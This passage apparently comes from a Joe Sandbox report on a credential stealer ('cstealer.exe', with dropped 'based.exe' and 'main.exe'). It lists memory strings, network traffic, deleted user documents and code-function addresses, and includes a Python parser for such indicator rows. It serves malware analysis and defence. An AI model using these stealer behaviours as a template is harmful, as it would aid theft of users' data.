                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com)z
                                Source: cstealer.exe, 00000003.00000003.2475616285.00000271DA3F9000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2475194270.00000271DA3F4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552638116.00000271DA40A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2545364608.00000271DA401000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2682591127.00000271DA401000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2523478749.00000271DA3FD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2509975417.00000271DA3FC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219080710.00000201030AC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2284408959.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215320232.0000020102E12000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218139223.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2286124476.0000020102E14000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2276614060.0000020103094000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339153466.0000020102E1D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221688107.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2276235445.000002010308A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2351020325.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219861394.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 
00000009.00000003.2290986638.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://youtube.com)
                                Source: cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com)z
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS
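The string and traffic rows above are raw Joe Sandbox indicator rows. When the page is extracted the boundary between the Source column and the indicator column is often lost ("...sdmpString found in binary or memory: ..."), and the URLs carry whatever bytes followed them in the scanned memory region ("https://tiktok.com)z"), so the same indicator shows up several times under slightly different spellings. The parser below is an added example, not part of the report: it turns such rows into records keyed by process name and PID, normalises the URL, decodes the port pairs and the TLS endpoint, and collapses the result into the pivot list an investigator actually wants (which URL was held by which PIDs, and which remote endpoints were contacted). The sample rows are constructed from shortened copies of the entries above; the based.exe path in the last sample is simplified.

```python
"""Parse Joe Sandbox 'Source: <origin> | <indicator>: <detail>' rows.

Added example, not part of the report.  Accepts both an intact column
separator (' | ') and the fused form left by extraction
('...sdmpString found in binary or memory: ...').
"""
import re
from collections import defaultdict

INDICATORS = (
    "String found in binary or memory",
    "Network traffic detected",
    "HTTPS traffic detected",
    "Code function",
    "File deleted",
    "Process created",
    "WMI Queries",
)
ROW_RE = re.compile(
    r"^\s*Source:\s*(?P<source>.*?)\s*(?:\|\s*)?(?P<kind>"
    + "|".join(re.escape(k) for k in INDICATORS)
    + r"):\s*(?P<detail>.*?)\s*$"
)
# Memory-dump reference as written in the Source column:
#   PID.STATE.TIMESTAMP.BASE.PROTECT.TYPE.FLAGS.OFFSET.sdmp  (hex fields, decimal timestamp)
DUMP_RE = re.compile(r"^([0-9A-F]{8})\.[0-9A-F]{8}\.\d+\.([0-9A-F]{16})(?:\.[0-9A-F]{8}){4}\.sdmp$")
URL_RE = re.compile(r"https?://[A-Za-z0-9._~\-/?#=&%:+]+")
PORTS_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
TLS_RE = re.compile(r"(\d+(?:\.\d+){3}):(\d+) -> (\d+(?:\.\d+){3}):(\d+) version: (.+)")


def parse_source(source):
    """Map each process name in the Source column to the PIDs of the dump
    references that follow it (the PID field is hexadecimal: 00000009 -> 9)."""
    procs = defaultdict(set)
    current = None
    for part in (p.strip() for p in source.split(",")):
        m = DUMP_RE.match(part)
        if m:
            procs[current].add(int(m.group(1), 16))
        else:
            current = part
            procs.setdefault(current, set())
    return dict(procs)


def normalize_url(detail):
    """Cut the URL out of the scanned string and drop scan noise that follows
    it (')', ')z').  Noise made of URL-legal characters (.../CPS0, .../H)
    cannot be told apart from the path and is left in place."""
    m = URL_RE.search(detail)
    return m.group(0).rstrip(".,") if m else None


def parse_row(row):
    """Return a record dict for one indicator row, or None if it is not one."""
    m = ROW_RE.match(row)
    if not m:
        return None
    rec = {"kind": m["kind"], "source": m["source"], "detail": m["detail"]}
    if rec["kind"] == "String found in binary or memory":
        procs = parse_source(rec["source"])
        rec["processes"] = sorted(p for p in procs if p)
        rec["pids"] = set().union(*procs.values())
        rec["url"] = normalize_url(rec["detail"])
    elif rec["kind"] == "Network traffic detected":
        p = PORTS_RE.search(rec["detail"])
        rec["ports"] = (int(p[1]), int(p[2])) if p else None
    elif rec["kind"] == "HTTPS traffic detected":
        t = TLS_RE.search(rec["detail"])
        rec["tls"] = (t[1], int(t[2]), t[3], int(t[4]), t[5]) if t else None
    return rec


def parse_report(text):
    """Parse every indicator row in `text`, skipping headers and blank lines."""
    return [r for r in (parse_row(line) for line in text.splitlines()) if r]


def summarize(records):
    """Collapse records into URL -> PIDs that held it, plus the set of remote
    TLS endpoints; this is the pivot list for the rest of the investigation."""
    urls, remote = defaultdict(set), set()
    for r in records:
        if r["kind"] == "String found in binary or memory" and r["url"]:
            urls[r["url"]] |= r["pids"]
        elif r["kind"] == "HTTPS traffic detected" and r["tls"]:
            remote.add((r["tls"][0], r["tls"][1]))
    return {"urls": dict(urls), "remote_endpoints": remote}


# Constructed sample rows: shortened copies of report entries (the based.exe
# path is simplified).  Row 2 keeps the column separator; rows 1, 3 and 5
# show the fused form.  The last line is a section header, not a row.
SAMPLE_ROWS = "\n".join([
    "Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, "
    "cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp"
    "String found in binary or memory: https://tiktok.com)",
    "Source: cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp"
    " | String found in binary or memory: https://tiktok.com)z",
    "Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742",
    "Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49718 version: TLS 1.2",
    r"Source: C:\ProgramData\Microsoft\based.exeFile deleted: C:\Users\user\Desktop\EOWRVPQCCS.xlsx",
    "Networking",
])

if __name__ == "__main__":
    for url, pids in summarize(parse_report(SAMPLE_ROWS))["urls"].items():
        print(url, sorted(pids))
```

Run it against the text of a whole report rather than a section: the PID sets are what let you tell a string that only ever lived in the PyInstaller bootstrap (PID 2/7 here) from one the unpacked payload (PID 3/9) actually used.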

Spam, unwanted Advertisements and Ransom Demands

Source: C:\ProgramData\Microsoft\based.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ??? \Common Files\Desktop\EOWRVPQCCS.xlsx
Source: C:\ProgramData\Microsoft\based.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ??? \Common Files\Desktop\EOWRVPQCCS.xlsx
Source: C:\ProgramData\Microsoft\based.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ??? \Common Files\Desktop\DUUDTUBZFW.pdf
Source: C:\ProgramData\Microsoft\based.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ??? \Common Files\Desktop\DUUDTUBZFW.pdf
Source: C:\ProgramData\Microsoft\based.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ??? \Common Files\Desktop\PALRGUCVEH.docx
Source: cmd.exe | Process created: 50

System Summary

Source: C:\ProgramData\Microsoft\based.exe | Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 3615
Source: C:\ProgramData\Microsoft\based.exe | Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 3615
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00000271DC6728C8 NtEnumerateValueKey,NtEnumerateValueKey, | 3_2_00000271DC6728C8
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 7_2_0000014E712828C8 NtEnumerateValueKey,NtEnumerateValueKey, | 7_2_0000014E712828C8
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 7_2_0000014E7128253C NtQueryDirectoryFileEx,GetFileType,StrCpyW, | 7_2_0000014E7128253C
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 7_2_0000014E7128202C NtQuerySystemInformation,StrCmpNIW, | 7_2_0000014E7128202C
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 7_2_0000014E71282B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW, | 7_2_0000014E71282B2C
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 7_2_0000014E71282B2C: NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW, | 7_2_0000014E71282B2C
Source: C:\Users\user\Desktop\DevxExecutor.exe | Code function: 0_2_00007FF848F00B95 | 0_2_00007FF848F00B95
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00000271DC6538A8 | 3_2_00000271DC6538A8
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00000271DC64D0E0 | 3_2_00000271DC64D0E0
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00000271DC641F2C | 3_2_00000271DC641F2C
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00000271DC6844A8 | 3_2_00000271DC6844A8
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00000271DC67DCE0 | 3_2_00000271DC67DCE0
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00000271DC672B2C | 3_2_00000271DC672B2C
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957E1000 | 3_2_00007FF6957E1000
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF695807A9C | 3_2_00007FF695807A9C
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6958026C4 | 3_2_00007FF6958026C4
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957F3ED0 | 3_2_00007FF6957F3ED0
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957F8EF4 | 3_2_00007FF6957F8EF4
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF695804EFC | 3_2_00007FF695804EFC
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF695801720 | 3_2_00007FF695801720
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957F8670 | 3_2_00007FF6957F8670
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957F2684 | 3_2_00007FF6957F2684
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF695806DCC | 3_2_00007FF695806DCC
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957F3540 | 3_2_00007FF6957F3540
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF695807550 | 3_2_00007FF695807550
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957E9D9B | 3_2_00007FF6957E9D9B
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957F2070 | 3_2_00007FF6957F2070
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957F2890 | 3_2_00007FF6957F2890
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957F8670 | 3_2_00007FF6957F8670
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF69580A7D8 | 3_2_00007FF69580A7D8
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957FE80C | 3_2_00007FF6957FE80C
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957E9F3B | 3_2_00007FF6957E9F3B
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957F6750 | 3_2_00007FF6957F6750
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957EA76D | 3_2_00007FF6957EA76D
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957F42D4 | 3_2_00007FF6957F42D4
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957E92D0 | 3_2_00007FF6957E92D0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957FF3203_2_00007FF6957FF320
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF695804A603_2_00007FF695804A60
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F22743_2_00007FF6957F2274
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6958017203_2_00007FF695801720
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F2A943_2_00007FF6957F2A94
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F84BC3_2_00007FF6957F84BC
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957FAC503_2_00007FF6957FAC50
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957F24803_2_00007FF6957F2480
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957FECA03_2_00007FF6957FECA0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF695806B503_2_00007FF695806B50
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957E7B603_2_00007FF6957E7B60
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A491E5A03_2_00007FF8A491E5A0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49A05B03_2_00007FF8A49A05B0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49155B03_2_00007FF8A49155B0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49565903_2_00007FF8A4956590
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A496F5E03_2_00007FF8A496F5E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A498E5F03_2_00007FF8A498E5F0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49145C03_2_00007FF8A49145C0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A491C5403_2_00007FF8A491C540
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49326803_2_00007FF8A4932680
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A491A6203_2_00007FF8A491A620
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48F66553_2_00007FF8A48F6655
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48F665D3_2_00007FF8A48F665D
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49747803_2_00007FF8A4974780
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A491B7C03_2_00007FF8A491B7C0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A490B7703_2_00007FF8A490B770
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48F28883_2_00007FF8A48F2888
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49818E03_2_00007FF8A49818E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A490A8C03_2_00007FF8A490A8C0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49068003_2_00007FF8A4906800
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A499F8103_2_00007FF8A499F810
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48F41803_2_00007FF8A48F4180
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49121E03_2_00007FF8A49121E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49971D03_2_00007FF8A49971D0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A499E1D03_2_00007FF8A499E1D0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A490B1203_2_00007FF8A490B120
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49471503_2_00007FF8A4947150
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48FE2203_2_00007FF8A48FE220
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49382703_2_00007FF8A4938270
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49923E03_2_00007FF8A49923E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49933D03_2_00007FF8A49933D0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49083703_2_00007FF8A4908370
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48FA3703_2_00007FF8A48FA370
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48FF4B03_2_00007FF8A48FF4B0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49814E03_2_00007FF8A49814E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49AC4D03_2_00007FF8A49AC4D0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4901D903_2_00007FF8A4901D90
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4936DB03_2_00007FF8A4936DB0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48F8DC03_2_00007FF8A48F8DC0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4966DC03_2_00007FF8A4966DC0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4967DD03_2_00007FF8A4967DD0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A494DD003_2_00007FF8A494DD00
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4929D163_2_00007FF8A4929D16
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4974F903_2_00007FF8A4974F90
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A499EFE03_2_00007FF8A499EFE0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4904FD03_2_00007FF8A4904FD0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A499BF203_2_00007FF8A499BF20
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A490FF003_2_00007FF8A490FF00
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A495BF703_2_00007FF8A495BF70
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4944F503_2_00007FF8A4944F50
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A495F0903_2_00007FF8A495F090
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48F30D43_2_00007FF8A48F30D4
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48F60F03_2_00007FF8A48F60F0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49480203_2_00007FF8A4948020
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A491B0003_2_00007FF8A491B000
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49499803_2_00007FF8A4949980
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A49729E03_2_00007FF8A49729E0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A494B9203_2_00007FF8A494B920
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A493C9403_2_00007FF8A493C940
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4923A003_2_00007FF8A4923A00
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48F6A623_2_00007FF8A48F6A62
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4946B103_2_00007FF8A4946B10
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A494FB103_2_00007FF8A494FB10
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A48F3B703_2_00007FF8A48F3B70
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4977CD03_2_00007FF8A4977CD0
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF8A4998C503_2_00007FF8A4998C50
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6E910004_2_00007FF6D6E91000
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6E99D9B4_2_00007FF6D6E99D9B
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA86704_2_00007FF6D6EA8670
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6E97B604_2_00007FF6D6E97B60
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EB6B504_2_00007FF6D6EB6B50
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EB7A9C4_2_00007FF6D6EB7A9C
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EAE80C4_2_00007FF6D6EAE80C
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EBA7D84_2_00007FF6D6EBA7D8
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA86704_2_00007FF6D6EA8670
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6E9A76D4_2_00007FF6D6E9A76D
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EA67504_2_00007FF6D6EA6750
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6E99F3B4_2_00007FF6D6E99F3B
